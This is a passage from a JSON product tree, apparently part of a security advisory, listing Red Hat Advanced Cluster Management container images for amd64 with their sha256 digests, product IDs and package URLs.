"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:60546ec2d4128da096811949b2609bdb9c7cb6205b36673ebe9d7b1ff868ea88_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:60546ec2d4128da096811949b2609bdb9c7cb6205b36673ebe9d7b1ff868ea88_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:60546ec2d4128da096811949b2609bdb9c7cb6205b36673ebe9d7b1ff868ea88_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-cluster-permission-rhel9@sha256%3A60546ec2d4128da096811949b2609bdb9c7cb6205b36673ebe9d7b1ff868ea88?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773285089"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b182a45fbe8caf69df6145ed79f2ab0e82c955ff5f5caa7fab8d0faffdb50664_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b182a45fbe8caf69df6145ed79f2ab0e82c955ff5f5caa7fab8d0faffdb50664_amd64",
"product_id": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b182a45fbe8caf69df6145ed79f2ab0e82c955ff5f5caa7fab8d0faffdb50664_amd64",
"product_identification_helper": {
"purl": "pkg:oci/config-policy-controller-rhel9@sha256%3Ab182a45fbe8caf69df6145ed79f2ab0e82c955ff5f5caa7fab8d0faffdb50664?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1772926643"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/console-rhel9@sha256:8b0e5d09b887020a657b93953a63a788cf6dfc84200038be8417c2f9cd1df736_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/console-rhel9@sha256:8b0e5d09b887020a657b93953a63a788cf6dfc84200038be8417c2f9cd1df736_amd64",
"product_id": "registry.redhat.io/rhacm2/console-rhel9@sha256:8b0e5d09b887020a657b93953a63a788cf6dfc84200038be8417c2f9cd1df736_amd64",
"product_identification_helper": {
"purl": "pkg:oci/console-rhel9@sha256%3A8b0e5d09b887020a657b93953a63a788cf6dfc84200038be8417c2f9cd1df736?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259174"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:6938b16a6314149cc86e10a91e05e9b84e00483dadd1d0353002222a350746bf_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:6938b16a6314149cc86e10a91e05e9b84e00483dadd1d0353002222a350746bf_amd64",
"product_id": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:6938b16a6314149cc86e10a91e05e9b84e00483dadd1d0353002222a350746bf_amd64",
"product_identification_helper": {
"purl": "pkg:oci/endpoint-monitoring-rhel9-operator@sha256%3A6938b16a6314149cc86e10a91e05e9b84e00483dadd1d0353002222a350746bf?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773737268"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b97cb625d22889517ef86b148ca4bfcc20e39bb887e0715ac37bd915cf45a83b_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b97cb625d22889517ef86b148ca4bfcc20e39bb887e0715ac37bd915cf45a83b_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b97cb625d22889517ef86b148ca4bfcc20e39bb887e0715ac37bd915cf45a83b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-governance-policy-addon-controller-rhel9@sha256%3Ab97cb625d22889517ef86b148ca4bfcc20e39bb887e0715ac37bd915cf45a83b?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773233435"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:922167d560484b217f772384cac0e9da48c31633ebf8984abf3ef99f5c31919b_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:922167d560484b217f772384cac0e9da48c31633ebf8984abf3ef99f5c31919b_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:922167d560484b217f772384cac0e9da48c31633ebf8984abf3ef99f5c31919b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-governance-policy-framework-addon-rhel9@sha256%3A922167d560484b217f772384cac0e9da48c31633ebf8984abf3ef99f5c31919b?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1772926628"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:5bf4239a40668dd33521ad9cebdc2022331e251ad6fd2e8ec0de8526d321b9e5_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:5bf4239a40668dd33521ad9cebdc2022331e251ad6fd2e8ec0de8526d321b9e5_amd64",
"product_id": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:5bf4239a40668dd33521ad9cebdc2022331e251ad6fd2e8ec0de8526d321b9e5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/governance-policy-propagator-rhel9@sha256%3A5bf4239a40668dd33521ad9cebdc2022331e251ad6fd2e8ec0de8526d321b9e5?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259158"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:9abfdfd7491e219d7249800e05298472c4d545687fa7b6c79da71f9414f29d12_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:9abfdfd7491e219d7249800e05298472c4d545687fa7b6c79da71f9414f29d12_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:9abfdfd7491e219d7249800e05298472c4d545687fa7b6c79da71f9414f29d12_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-grafana-rhel9@sha256%3A9abfdfd7491e219d7249800e05298472c4d545687fa7b6c79da71f9414f29d12?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774002166"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:4b1bdbd8499769e3fe41d438ff2f98a0a91fecf88d70aa359a6be16aa5454fda_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:4b1bdbd8499769e3fe41d438ff2f98a0a91fecf88d70aa359a6be16aa5454fda_amd64",
"product_id": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:4b1bdbd8499769e3fe41d438ff2f98a0a91fecf88d70aa359a6be16aa5454fda_amd64",
"product_identification_helper": {
"purl": "pkg:oci/grafana-dashboard-loader-rhel9@sha256%3A4b1bdbd8499769e3fe41d438ff2f98a0a91fecf88d70aa359a6be16aa5454fda?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773737272"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:036d63ee1fe55977200dce97fd151726266e84423067039c57ca54dcc8b6b440_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:036d63ee1fe55977200dce97fd151726266e84423067039c57ca54dcc8b6b440_amd64",
"product_id": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:036d63ee1fe55977200dce97fd151726266e84423067039c57ca54dcc8b6b440_amd64",
"product_identification_helper": {
"purl": "pkg:oci/insights-client-rhel9@sha256%3A036d63ee1fe55977200dce97fd151726266e84423067039c57ca54dcc8b6b440?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773099456"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:4707fd802a74ca843e2b788b69dc1d4615acba980df380e0cc25cfca6a82e215_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:4707fd802a74ca843e2b788b69dc1d4615acba980df380e0cc25cfca6a82e215_amd64",
"product_id": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:4707fd802a74ca843e2b788b69dc1d4615acba980df380e0cc25cfca6a82e215_amd64",
"product_identification_helper": {
"purl": "pkg:oci/insights-metrics-rhel9@sha256%3A4707fd802a74ca843e2b788b69dc1d4615acba980df380e0cc25cfca6a82e215?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773531402"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:fffd63a467ff39cb493e680ca5d7fff974c66afb014f3d5e83591b934e58b2ac_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:fffd63a467ff39cb493e680ca5d7fff974c66afb014f3d5e83591b934e58b2ac_amd64",
"product_id": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:fffd63a467ff39cb493e680ca5d7fff974c66afb014f3d5e83591b934e58b2ac_amd64",
"product_identification_helper": {
"purl": "pkg:oci/klusterlet-addon-controller-rhel9@sha256%3Afffd63a467ff39cb493e680ca5d7fff974c66afb014f3d5e83591b934e58b2ac?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773090422"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:997e343d3a52d953cca38ea609dabfa38d8e85e3122f0c48bdf34dc398b0e75c_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:997e343d3a52d953cca38ea609dabfa38d8e85e3122f0c48bdf34dc398b0e75c_amd64",
"product_id": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:997e343d3a52d953cca38ea609dabfa38d8e85e3122f0c48bdf34dc398b0e75c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kube-rbac-proxy-rhel9@sha256%3A997e343d3a52d953cca38ea609dabfa38d8e85e3122f0c48bdf34dc398b0e75c?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259149"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a5544dbf33ee411c1e2bce8af5cfd7defda6de92a358097419f2bac069669275_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a5544dbf33ee411c1e2bce8af5cfd7defda6de92a358097419f2bac069669275_amd64",
"product_id": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a5544dbf33ee411c1e2bce8af5cfd7defda6de92a358097419f2bac069669275_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kube-state-metrics-rhel9@sha256%3Aa5544dbf33ee411c1e2bce8af5cfd7defda6de92a358097419f2bac069669275?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259171"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:92c1123b4f6c4e89be7a0d9cd4adcafb9b97faebebd61dc24127661e45b61ec7_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:92c1123b4f6c4e89be7a0d9cd4adcafb9b97faebebd61dc24127661e45b61ec7_amd64",
"product_id": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:92c1123b4f6c4e89be7a0d9cd4adcafb9b97faebebd61dc24127661e45b61ec7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/memcached-exporter-rhel9@sha256%3A92c1123b4f6c4e89be7a0d9cd4adcafb9b97faebebd61dc24127661e45b61ec7?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773940676"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:345bd79af661294f223be69961f96494da36e311906fb3a2e64b53677f65fd32_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:345bd79af661294f223be69961f96494da36e311906fb3a2e64b53677f65fd32_amd64",
"product_id": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:345bd79af661294f223be69961f96494da36e311906fb3a2e64b53677f65fd32_amd64",
"product_identification_helper": {
"purl": "pkg:oci/metrics-collector-rhel9@sha256%3A345bd79af661294f223be69961f96494da36e311906fb3a2e64b53677f65fd32?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773737255"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:f64b875dcce5d957aaf198e2055a47f7faab441342aab6b2e055efe2d41c78b7_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:f64b875dcce5d957aaf198e2055a47f7faab441342aab6b2e055efe2d41c78b7_amd64",
"product_id": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:f64b875dcce5d957aaf198e2055a47f7faab441342aab6b2e055efe2d41c78b7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/multicloud-integrations-rhel9@sha256%3Af64b875dcce5d957aaf198e2055a47f7faab441342aab6b2e055efe2d41c78b7?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259164"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:d32bc1e886821ba104e8b2a5e16dc7b0aa1a01ea927e426ebd264298ac1d66f8_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:d32bc1e886821ba104e8b2a5e16dc7b0aa1a01ea927e426ebd264298ac1d66f8_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:d32bc1e886821ba104e8b2a5e16dc7b0aa1a01ea927e426ebd264298ac1d66f8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-multicluster-observability-addon-rhel9@sha256%3Ad32bc1e886821ba104e8b2a5e16dc7b0aa1a01ea927e426ebd264298ac1d66f8?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773674653"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9bac11bcf557740673e7168bb31fb6db8c5d92609094e5f1d1cb4c3ef6bc9603_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9bac11bcf557740673e7168bb31fb6db8c5d92609094e5f1d1cb4c3ef6bc9603_amd64",
"product_id": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9bac11bcf557740673e7168bb31fb6db8c5d92609094e5f1d1cb4c3ef6bc9603_amd64",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-observability-rhel9-operator@sha256%3A9bac11bcf557740673e7168bb31fb6db8c5d92609094e5f1d1cb4c3ef6bc9603?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773737255"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:d9a867a6d289263f568b8940a9b970c8680061c1f26aebb9f8cc479956e9a030_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:d9a867a6d289263f568b8940a9b970c8680061c1f26aebb9f8cc479956e9a030_amd64",
"product_id": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:d9a867a6d289263f568b8940a9b970c8680061c1f26aebb9f8cc479956e9a030_amd64",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-operators-application-rhel9@sha256%3Ad9a867a6d289263f568b8940a9b970c8680061c1f26aebb9f8cc479956e9a030?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259182"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1bda811b132cbc2220815d36983af98e0aafdcb4d30fa78f56bbd85ffc30a37c_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1bda811b132cbc2220815d36983af98e0aafdcb4d30fa78f56bbd85ffc30a37c_amd64",
"product_id": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1bda811b132cbc2220815d36983af98e0aafdcb4d30fa78f56bbd85ffc30a37c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-operators-channel-rhel9@sha256%3A1bda811b132cbc2220815d36983af98e0aafdcb4d30fa78f56bbd85ffc30a37c?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773358651"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e3d8e0154fdaaa4e292949374fa637ec80827df473f2e3f8cc37425d98dc271b_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e3d8e0154fdaaa4e292949374fa637ec80827df473f2e3f8cc37425d98dc271b_amd64",
"product_id": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e3d8e0154fdaaa4e292949374fa637ec80827df473f2e3f8cc37425d98dc271b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-operators-subscription-rhel9@sha256%3Ae3d8e0154fdaaa4e292949374fa637ec80827df473f2e3f8cc37425d98dc271b?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773090513"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:ee2ffe06e09f3694be474d69be61552d0e5a4dd7a25df89682aa59e4a10e02f8_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:ee2ffe06e09f3694be474d69be61552d0e5a4dd7a25df89682aa59e4a10e02f8_amd64",
"product_id": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:ee2ffe06e09f3694be474d69be61552d0e5a4dd7a25df89682aa59e4a10e02f8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/multiclusterhub-rhel9@sha256%3Aee2ffe06e09f3694be474d69be61552d0e5a4dd7a25df89682aa59e4a10e02f8?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773145770"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:0dbdb9d02b41e437dd885741918114d8eea5bcdb1e97098b8e026adaf0cc70de_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:0dbdb9d02b41e437dd885741918114d8eea5bcdb1e97098b8e026adaf0cc70de_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:0dbdb9d02b41e437dd885741918114d8eea5bcdb1e97098b8e026adaf0cc70de_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-must-gather-rhel9@sha256%3A0dbdb9d02b41e437dd885741918114d8eea5bcdb1e97098b8e026adaf0cc70de?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773358606"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6528ed4780303fa09312c19f87c0f7d7109d91858473f73e6567e0fdde694b3f_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6528ed4780303fa09312c19f87c0f7d7109d91858473f73e6567e0fdde694b3f_amd64",
"product_id": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6528ed4780303fa09312c19f87c0f7d7109d91858473f73e6567e0fdde694b3f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/node-exporter-rhel9@sha256%3A6528ed4780303fa09312c19f87c0f7d7109d91858473f73e6567e0fdde694b3f?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773680755"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:55b2f0e54a6fdb3fb83f1af1f16524ebf36f0afb366f40fbbc8768cd4995ffb3_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:55b2f0e54a6fdb3fb83f1af1f16524ebf36f0afb366f40fbbc8768cd4995ffb3_amd64",
"product_id": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:55b2f0e54a6fdb3fb83f1af1f16524ebf36f0afb366f40fbbc8768cd4995ffb3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/observatorium-rhel9@sha256%3A55b2f0e54a6fdb3fb83f1af1f16524ebf36f0afb366f40fbbc8768cd4995ffb3?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773185861"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:28cfe0893f17b70ff67f70cb7e471c8c724bf921b7a36c69ca2c43505bae635e_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:28cfe0893f17b70ff67f70cb7e471c8c724bf921b7a36c69ca2c43505bae635e_amd64",
"product_id": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:28cfe0893f17b70ff67f70cb7e471c8c724bf921b7a36c69ca2c43505bae635e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/observatorium-rhel9-operator@sha256%3A28cfe0893f17b70ff67f70cb7e471c8c724bf921b7a36c69ca2c43505bae635e?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773233517"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a8f9a5a9f31cd903f23dfec9c832ed703d06882246aad25bd03e9512b633e5ca_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a8f9a5a9f31cd903f23dfec9c832ed703d06882246aad25bd03e9512b633e5ca_amd64",
"product_id": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a8f9a5a9f31cd903f23dfec9c832ed703d06882246aad25bd03e9512b633e5ca_amd64",
"product_identification_helper": {
"purl": "pkg:oci/prometheus-rhel9@sha256%3Aa8f9a5a9f31cd903f23dfec9c832ed703d06882246aad25bd03e9512b633e5ca?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773680743"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:6b3fd2f8e3a164670dbbc59fd8c77057f98d97c0ba6ed7975711923e8acabb78_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:6b3fd2f8e3a164670dbbc59fd8c77057f98d97c0ba6ed7975711923e8acabb78_amd64",
"product_id": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:6b3fd2f8e3a164670dbbc59fd8c77057f98d97c0ba6ed7975711923e8acabb78_amd64",
"product_identification_helper": {
"purl": "pkg:oci/prometheus-alertmanager-rhel9@sha256%3A6b3fd2f8e3a164670dbbc59fd8c77057f98d97c0ba6ed7975711923e8acabb78?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773680634"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:d865a100823ff771c33e5e5799f16e1207158ab7519c6ac8a4daf53e1c4ae092_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:d865a100823ff771c33e5e5799f16e1207158ab7519c6ac8a4daf53e1c4ae092_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:d865a100823ff771c33e5e5799f16e1207158ab7519c6ac8a4daf53e1c4ae092_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-prometheus-config-reloader-rhel9@sha256%3Ad865a100823ff771c33e5e5799f16e1207158ab7519c6ac8a4daf53e1c4ae092?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259208"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:7d87a9cda623d527c5eaa08c5637422ed136339a9688edd5e8e9cc46f254beb3_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:7d87a9cda623d527c5eaa08c5637422ed136339a9688edd5e8e9cc46f254beb3_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:7d87a9cda623d527c5eaa08c5637422ed136339a9688edd5e8e9cc46f254beb3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-prometheus-rhel9@sha256%3A7d87a9cda623d527c5eaa08c5637422ed136339a9688edd5e8e9cc46f254beb3?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259157"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:c7a24bf421728915b2e0cf3a7e803cbb18032959feab0cd2867b13f356136178_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:c7a24bf421728915b2e0cf3a7e803cbb18032959feab0cd2867b13f356136178_amd64",
"product_id": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:c7a24bf421728915b2e0cf3a7e803cbb18032959feab0cd2867b13f356136178_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rbac-query-proxy-rhel9@sha256%3Ac7a24bf421728915b2e0cf3a7e803cbb18032959feab0cd2867b13f356136178?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773737262"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:699833b6f4ee8b8fdb45d5ed4a312972281576700a1a1d28dc0048d6c7188361_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:699833b6f4ee8b8fdb45d5ed4a312972281576700a1a1d28dc0048d6c7188361_amd64",
"product_id": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:699833b6f4ee8b8fdb45d5ed4a312972281576700a1a1d28dc0048d6c7188361_amd64",
"product_identification_helper": {
"purl": "pkg:oci/search-collector-rhel9@sha256%3A699833b6f4ee8b8fdb45d5ed4a312972281576700a1a1d28dc0048d6c7188361?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773099472"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:9a6847c058acd9d84d402506ac00576e0c437edb261c8e564605abab1b97428c_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:9a6847c058acd9d84d402506ac00576e0c437edb261c8e564605abab1b97428c_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:9a6847c058acd9d84d402506ac00576e0c437edb261c8e564605abab1b97428c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-search-indexer-rhel9@sha256%3A9a6847c058acd9d84d402506ac00576e0c437edb261c8e564605abab1b97428c?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773233417"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:6dbefefd5b830cd9431559d7123d9643dca69e0cbbb58f5c5cc90f3d5e526c09_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:6dbefefd5b830cd9431559d7123d9643dca69e0cbbb58f5c5cc90f3d5e526c09_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:6dbefefd5b830cd9431559d7123d9643dca69e0cbbb58f5c5cc90f3d5e526c09_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-search-v2-api-rhel9@sha256%3A6dbefefd5b830cd9431559d7123d9643dca69e0cbbb58f5c5cc90f3d5e526c09?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773233463"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:247872fe30c6d0bbb1098b6f189fd23aca2357122e591eb2bed3c79b0fe27055_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:247872fe30c6d0bbb1098b6f189fd23aca2357122e591eb2bed3c79b0fe27055_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:247872fe30c6d0bbb1098b6f189fd23aca2357122e591eb2bed3c79b0fe27055_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-search-v2-rhel9@sha256%3A247872fe30c6d0bbb1098b6f189fd23aca2357122e591eb2bed3c79b0fe27055?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773233441"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:243d75725446e0fe6be10ba04796c4db395f911470d1fd2575d35a3f1c82930c_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:243d75725446e0fe6be10ba04796c4db395f911470d1fd2575d35a3f1c82930c_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:243d75725446e0fe6be10ba04796c4db395f911470d1fd2575d35a3f1c82930c_amd64",
"product_identification_helper": {
